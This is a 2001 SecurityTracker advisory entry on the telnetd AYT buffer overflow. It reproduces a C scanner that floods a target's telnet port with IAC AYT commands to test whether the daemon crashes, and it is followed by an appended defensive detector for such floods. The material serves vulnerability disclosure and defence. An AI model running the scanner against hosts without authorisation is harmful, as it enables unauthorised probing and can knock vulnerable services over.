SecurityTracker.com
Category:   Application (Generic)  >   Telnet
Vendors:   [Multiple Authors/Vendors]
(A Scanner is Released) Re: Telnet Daemons May Give Remote Users Root Level Access Privileges
SecurityTracker Alert ID:  1002081
SecurityTracker URL:  http://securitytracker.com/id/1002081
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 25 2001
Impact:   Execution of arbitrary code via network, Root access via network, User access via network


Description:   TESO reported that many BSD-derived Telnet daemons (servers) contain a vulnerability that may allow a remote user to obtain root level access on the server.

A user has posted a utility that will scan for vulnerable systems. The source code is contained in the Source Message. For information on the vulnerability, see the Message History.

Impact:   A remote user can execute arbitrary code on the server with the privileges of the telnet server, which is typically root level privileges.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  many Linux and Unix OSs are vulnerable, but not all - see the Alert text for more information

Message History:   This archive entry is a follow-up to the message listed below.
Jul 18 2001 Telnet Daemons May Give Remote Users Root Level Access Privileges



 Source Message Contents

Subject:  Telnetd AYT overflow scanner


--nVMJ2NtxeReIH9PS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="SPtelnetAYT.c"

/*
 * Telnetd AYT overflow scanner, by Security Point(R)
 *              Bug found by scut of TESO Security
 *
 * Date: 25/07/01
 * Author: Security Point(R)
 * WWW: http://www.secpoint.com
 * Email: info@secpoint.com
 * 
 * This program checks for the AYT overflow related to the
 * newly discovered telnetd vulnerabilities.
 *
 * Tested against:
 *	Vulnerable:
 *		netkit-telnet-0.10
 *              FreeBSD 4.2
 *	Not vulnerable:
 *		netkit-telnet-0.17
 *
 * Please keep us updated with the OSs that you check, and
 * report back to us on info@secpoint.com, whether the system 
 * is vulnerable or not. So we can construct a full list 
 * of vulnerable systems.
 *
 *
 * This source code is for educational purpose ONLY, 
 * Security Point(R) will not be responsible for any damages 
 * whatsoever that have a connection with this code. There are 
 * no warranties with regard to this information.
 *
 * Are your networks under attack at this moment?
 *
 * With Security Point(R) Scanner you can find and repair the
 * Vulnerabilities before the bad guys get in.
 *
 * Please see http://www.secpoint.com/solutions.php
 *
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <strings.h>   /* bzero(), bcopy() */
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>


struct in_addr addr;
struct sockaddr_in address;
struct hostent *host;
int sock;

char sendbuffer[5120*2];
char buffer[5120*2];
int i;
int timeout;

void handle_alarm(int signum) {
    alarm(0);
    timeout=1;
}

int main (int argc, char *argv[]) {
    printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
    if (argc!=2) {
	printf("Usage: %s <host>\n", argv[0]);
	exit(EXIT_FAILURE);
    }
    printf("Host: %s\n", argv[1]);
    if ((host=gethostbyname(argv[1])) == NULL) {
	perror("gethostbyname");
	exit(EXIT_FAILURE);  // name resolution failed
    }
    if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {
	perror("socket");
	exit(EXIT_FAILURE);
    }
    bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length);
    address.sin_family=AF_INET;
    address.sin_port = htons(23);  // telnet
    if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {
	perror("connect");
	exit(EXIT_FAILURE);
    }
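    printf("Connected to remote host...\n");
    printf("Sending telnet options... stand by...\n");
    // 60-second alarm around each read below; whether SIGALRM actually
    // interrupts read() depends on the platform's signal() restart semantics
    signal(SIGALRM,handle_alarm);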

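    // Fill the whole buffer with IAC AYT pairs. Written byte by byte so that
    // no terminating NUL is stored past the end of sendbuffer and the buffer
    // is never passed to sprintf() as both source and destination.
    for (i=0;i<(int)(sizeof(sendbuffer)/2);i++) {
	sendbuffer[2*i]   = (char)255; // 0xff - IAC
	sendbuffer[2*i+1] = (char)246; // 0xf6 - AYT
    }
    // Read the server's initial negotiation before sending
    alarm(60);
    read(sock, buffer, sizeof(buffer));
    alarm(0);

    write(sock, sendbuffer, sizeof(sendbuffer));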
    
    bzero(buffer,sizeof(buffer));

    alarm(60);
    // EOF or a read error after the AYT burst is reported as vulnerable
    if (read(sock, buffer, sizeof(buffer)) <=0) {
	printf("Telnetd on %s vulnerable\n",argv[1]);
	exit(EXIT_SUCCESS);
    }
    alarm(0);
    printf("Telnetd on %s not vulnerable\n",argv[1]);
    exit(EXIT_SUCCESS);
}

--nVMJ2NtxeReIH9PS--
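
A defensive counterpart to the scanner above, as an added example that is not part of the original message or of the SecurityTracker entry: it measures the longest run of back-to-back IAC AYT commands in one contiguous capture of client-to-server telnet bytes, which is the pattern the scanner sends. The function names, the threshold of 64 and both sample buffers are assumptions constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>

#define IAC 255u            /* telnet "interpret as command" */
#define AYT 246u            /* "are you there" */
#define AYT_RUN_LIMIT 64u   /* assumed alert threshold, tune per site */

/* Longest run of back-to-back IAC AYT commands in one contiguous capture. */
size_t longest_ayt_run(const unsigned char *buf, size_t len)
{
    size_t i = 0, run = 0, best = 0;
    while (i < len) {
        if (buf[i] == IAC && i + 1 < len && buf[i + 1] == AYT) {
            if (++run > best) best = run;
            i += 2;
            continue;
        }
        run = 0;                          /* anything else breaks the run */
        if (buf[i] == IAC && i + 1 < len) {
            unsigned char c = buf[i + 1];
            /* WILL/WONT/DO/DONT (251..254) carry an option byte; IAC IAC is
             * an escaped 0xff data byte, so the byte after it is plain data. */
            i += (c >= 251 && c <= 254) ? 3 : 2;
        } else {
            i++;
        }
    }
    return best;
}

/* Nonzero when the capture holds at least `limit` consecutive IAC AYT pairs. */
int is_ayt_flood(const unsigned char *buf, size_t len, size_t limit)
{
    return longest_ayt_run(buf, len) >= limit;
}

int main(void)
{
    /* Constructed samples: 5120 IAC AYT pairs (the size the scanner sends),
     * and an ordinary session with option negotiation and a single AYT. */
    static unsigned char flood[5120 * 2];
    const unsigned char normal[] = { 255, 253, 1, 'l', 's', '\r', '\n', 255, 246 };
    for (size_t k = 0; k < sizeof(flood); k += 2) { flood[k] = IAC; flood[k + 1] = AYT; }

    printf("flood:  run=%zu alert=%d\n", longest_ayt_run(flood, sizeof(flood)),
           is_ayt_flood(flood, sizeof(flood), AYT_RUN_LIMIT));
    printf("normal: run=%zu alert=%d\n", longest_ayt_run(normal, sizeof(normal)),
           is_ayt_flood(normal, sizeof(normal), AYT_RUN_LIMIT));
    return 0;
}
```

A run that spans two separate captures is not joined, so feed the function a reassembled stream rather than individual packets.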

 
 



Copyright 2019, SecurityGlobal.net LLC